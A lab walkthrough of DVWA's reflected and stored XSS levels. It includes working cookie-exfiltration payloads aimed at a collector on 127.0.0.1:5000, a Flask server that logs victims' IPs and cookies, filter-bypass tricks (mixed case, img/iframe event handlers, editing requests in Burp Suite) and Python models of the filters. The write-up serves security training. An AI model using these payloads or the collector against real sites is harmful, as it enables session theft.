链接: https://github.com/dhgdhg/DVWA-Note
XSS(Reflected)
Chrome has to be started with the XSS Auditor switched off first, otherwise it blocks the reflected payloads:
chrome.exe --disable-xss-auditor
(only needed on old Chrome: the XSS Auditor was removed in Chrome 78, current versions execute reflected payloads without any flag)
low
<script>alert(document.cookie)</script>
So we can steal the cookie, hahaha, charge!
JS payload (creates an "image" whose URL points at our collector, with document.cookie in the query string):
<script>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</script>
Server side
Code (the collector: logs the victim's IP and the leaked cookie to ip-cookie.txt)
# a.py
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def get_cookie():
    # the payload requests /?cookie=<document.cookie>; write it next to the caller's IP
    cookie = request.args.get("cookie")
    ip = request.remote_addr
    with open('ip-cookie.txt', 'ab+') as f:
        f.write('{} {}\n'.format(ip, cookie).encode('utf8'))
    return ''
Run:
env FLASK_APP=a.py flask run
Sweet.
medium
<script>alert(document.cookie)</script>
- Comes back as Hello alert(document.cookie). Wait, where did my script go? (medium only str_replace()s the literal lowercase <script>; the leftover </script> is a stray end tag the browser silently drops)
- Try mixing the case
<ScRipt>alert(document.cookie)</ScRipt>
- Please accept my middle finger, hahahaha
<ScRipt>img=new Image();img.src="http://127.0.0.1:5000/?cookie="+document.cookie</ScRipt>
- Stealing cookies...
high
<script>alert(document.cookie)</script>
Comes back as Hello >. Seriously?
Try mixing the case
<ScRipt>alert(document.cookie)</ScRipt>
Hello > again, emm. OK, poke at the filter a bit:
script
, Hello script (a bare word survives)
<script
, Hello  (the half tag is gone: anything from a < through s, c, r, i, p, t in that order gets cut). Fine, I'll stop using script then, so annoying.
<img src=x onerror=alert(1)>
,<iframe onload=alert(1)>
Bang! <img src=x onerror=window.open("http://127.0.0.1:5000/?cookie="+document.cookie)>
(window.open is a popup, and browsers block popups that are not triggered by a user click, so this one is unreliable)
Bang! And the premium payload: no popup, the img simply points itself at the collector URL
<img src=x onerror=src='http://127.0.0.1:5000/?cookie='+document.cookie>
Server side code (the same collector, now limited with flask_limiter to one log line per IP per hour, presumably so a single victim cannot flood the log: the img-onerror payload can re-fire every time the collector answers with an empty, non-image body)
from flask import Flask, request
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

app = Flask(__name__)
# key_func as a keyword plus init_app() works with both flask-limiter 2.x and 3.x
# (2.x took app as the first positional argument, 3.x takes key_func there)
limiter = Limiter(key_func=get_remote_address, default_limits=["1 per hour"])
limiter.init_app(app)


@app.route('/')
def get_cookie():
    cookie = request.args.get("cookie")
    ip = request.remote_addr
    with open('ip-cookie.txt', 'ab+') as f:
        f.write('{} {}\n'.format(ip, cookie).encode('utf8'))
    return ''
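To check exactly which of the payloads above get through at each level without clicking around, here is a Python re-implementation of the reflected page's server-side filtering. This is an added example, not code from this note or from DVWA: the filter logic is my paraphrase of DVWA's PHP from memory (assumption: low echoes the input, medium str_replace()s the literal "<script>", high preg_replace()s /<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i, impossible uses htmlspecialchars()), and executes() is a deliberately crude "is there still live markup" heuristic that is enough for these payloads, not an HTML parser.

```python
import html
import re

# Added example, not DVWA's code: a Python paraphrase of what DVWA's reflected XSS
# page does to the `name` parameter at each level (assumption, from memory of the
# PHP source), so the payloads from this note can be checked against each filter.

SCRIPT_RE = re.compile(r'<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t', re.IGNORECASE)

# Payloads used in the note above.
PAYLOADS = {
    'plain': '<script>alert(document.cookie)</script>',
    'mixed case': '<ScRipt>alert(document.cookie)</ScRipt>',
    'img onerror': '<img src=x onerror=alert(1)>',
    'iframe onload': '<iframe onload=alert(1)>',
    'img exfil': "<img src=x onerror=src='http://127.0.0.1:5000/?cookie='+document.cookie>",
}


def reflect_low(name):
    """low: echoed as-is."""
    return name


def reflect_medium(name):
    """medium: str_replace('<script>', '') -- exact, lowercase, opening tag only."""
    return name.replace('<script>', '')


def reflect_high(name):
    """high: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '') -- a '<' followed
    by s, c, r, i, p, t in that order, any case, with anything in between."""
    return SCRIPT_RE.sub('', name)


def reflect_impossible(name):
    """impossible: htmlspecialchars(..., ENT_QUOTES) -- '<' can no longer open a tag."""
    return html.escape(name, quote=True)


def render(filtered):
    """The response body: DVWA prints '<pre>Hello ' . $name . '</pre>'."""
    return '<pre>Hello {}</pre>'.format(filtered)


def executes(fragment):
    """Crude 'is there still live script here' check: a complete <script>...</script>
    element, or a tag carrying an on* event handler. Not a parser; enough for these payloads."""
    low = fragment.lower()
    return bool(re.search(r'<script\b[^>]*>.*?</script\s*>', low, re.DOTALL)
                or re.search(r'<\w+[^>]*\son\w+\s*=', low))


def survivors(level):
    """Names of the payloads that still execute after `level` has filtered them."""
    return [name for name, payload in PAYLOADS.items() if executes(render(level(payload)))]


if __name__ == '__main__':
    for level in (reflect_low, reflect_medium, reflect_high, reflect_impossible):
        print('{:<18} {}'.format(level.__name__, survivors(level)))
```

Running it reproduces the walkthrough: medium loses only the lowercase <script> payload, high additionally kills the mixed-case one but leaves every img/iframe handler payload untouched because its regex only hunts for the letters of "script", and the htmlspecialchars() level leaves nothing executable.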
XSS(Stored)
- low
- name: 1
- message: <script>alert(1)</script>
- medium
- name: 1
- message: <script>alert(1)</script>
- dead
- name: 1
- message: <ScRipt>alert(1)</SCrIpt>
- dead
- name: 1
- message: <ScscriptRipt>alert(1)</SCrscriptIpt>
- dead
- name: 1
- message: <img src=1 onerror=alert(1)>
- dead (message goes through strip_tags(), so no tag at all survives in that field)
- name: <scRipt>
- message: 1
- mm-hmm (the tag comes back intact: name only loses the literal lowercase <script>)
- but name is limited to 10 characters, emm
- name: <scRipt>/*
- message: 1
- name: 2
- message: */alert(1);/*
- dead (nothing ever closes the comment or the tag, so the browser never runs it)
- Capture the request in Burp Suite and change the length, to see whether the limit is only enforced on the front end
- Sweet, it is (a maxlength attribute on the input, no check on the server)
- Burp Suite:
- name: <scRipt>alert(1)</scRipt>
- message: <scRipt>alert(2)</scRipt>
- message has the script tags filtered, but name doesn't, buddy, OK
- high
- Burp Suite:
- name: <scRipt>alert(5)</scRipt>
- message: 6
- dead
- name: <img src=x onerror=alert(6)> (or <iframe onload=alert(7)>)
- message: 1
- duang (pops: the high filter on name only hunts for script, an img or iframe with an event handler walks straight past it)
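The stored guestbook lesson is that the two fields are not filtered the same way and that the 10-character limit on name lives only in the browser. The model below, an added example and not DVWA's code, reproduces the medium/high behaviour seen above: the per-field filters and the rendered entry are paraphrased from my memory of the PHP source (assumption; the addslashes()/mysqli escaping is left out because none of these payloads contain quotes), strip_tags() is approximated with a tag-shaped regex, and executes() is the same crude live-markup heuristic as in the reflected example. via_browser=True models a normal form post that cannot exceed maxlength; via_browser=False models the request replayed from Burp Suite.

```python
import html
import re

# Added example, not DVWA's code: a model of the stored XSS guestbook's medium/high
# handling of the `name` and `message` fields (assumption, paraphrased from memory of
# the PHP source; addslashes/mysqli escaping are left out because none of the payloads
# here contain quotes). What it shows: the two fields are filtered differently, and the
# 10-character limit on name is a browser-side maxlength that the server never re-checks.

NAME_MAXLENGTH = 10   # <input name="txtName" maxlength="10"> -- enforced by the browser only
SCRIPT_RE = re.compile(r'<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t', re.IGNORECASE)


def strip_tags(s):
    """Rough stand-in for PHP strip_tags(): remove anything shaped like a tag."""
    return re.sub(r'<[^>]*>', '', s)


def filter_message(message):
    """medium and high both do strip_tags() then htmlspecialchars() on message."""
    return html.escape(strip_tags(message), quote=True)


def filter_name(name, level):
    """medium: drop the literal lowercase '<script>'; high: the loose script regex.
    Neither touches other tags such as <img> or <iframe>."""
    if level == 'medium':
        return name.replace('<script>', '')
    if level == 'high':
        return SCRIPT_RE.sub('', name)
    raise ValueError('unknown level: ' + level)


def submit(name, message, level, via_browser=True):
    """What ends up stored. A form post from the browser cannot exceed maxlength;
    a request replayed from Burp Suite skips that, and the server has no length check."""
    if via_browser:
        name = name[:NAME_MAXLENGTH]
    return filter_name(name, level), filter_message(message)


def render_entry(name, message):
    """How the guestbook prints one stored entry (roughly DVWA's markup)."""
    return '<div id="guestbook_comments">Name: {}<br />Message: {}<br /></div>\n'.format(name, message)


def executes(fragment):
    """Crude 'live script' check: a complete <script>...</script> or an on* handler on a tag."""
    low = fragment.lower()
    return bool(re.search(r'<script\b[^>]*>.*?</script\s*>', low, re.DOTALL)
                or re.search(r'<\w+[^>]*\son\w+\s*=', low))


def guestbook(entries, level, via_browser=True):
    """Render the page after storing each (name, message) pair in order."""
    return ''.join(render_entry(*submit(n, m, level, via_browser)) for n, m in entries)


def pops(entries, level, via_browser=True):
    """Does the guestbook, after these submissions, contain live script?"""
    return executes(guestbook(entries, level, via_browser))


if __name__ == '__main__':
    print('medium, script in message, browser :', pops([('1', '<script>alert(1)</script>')], 'medium'))
    print('medium, split across two entries   :', pops([('<scRipt>/*', '1'), ('2', '*/alert(1);/*')], 'medium'))
    print('medium, long script in name, burp  :', pops([('<scRipt>alert(1)</scRipt>', '1')], 'medium', via_browser=False))
    print('high, script in name, burp         :', pops([('<scRipt>alert(5)</scRipt>', '6')], 'high', via_browser=False))
    print('high, img onerror in name, burp    :', pops([('<img src=x onerror=alert(6)>', '1')], 'high', via_browser=False))
```

The same img payload submitted through the browser is truncated to "<img src=x" by maxlength and does nothing, which is why the walkthrough only gets results once the request is replayed from the proxy.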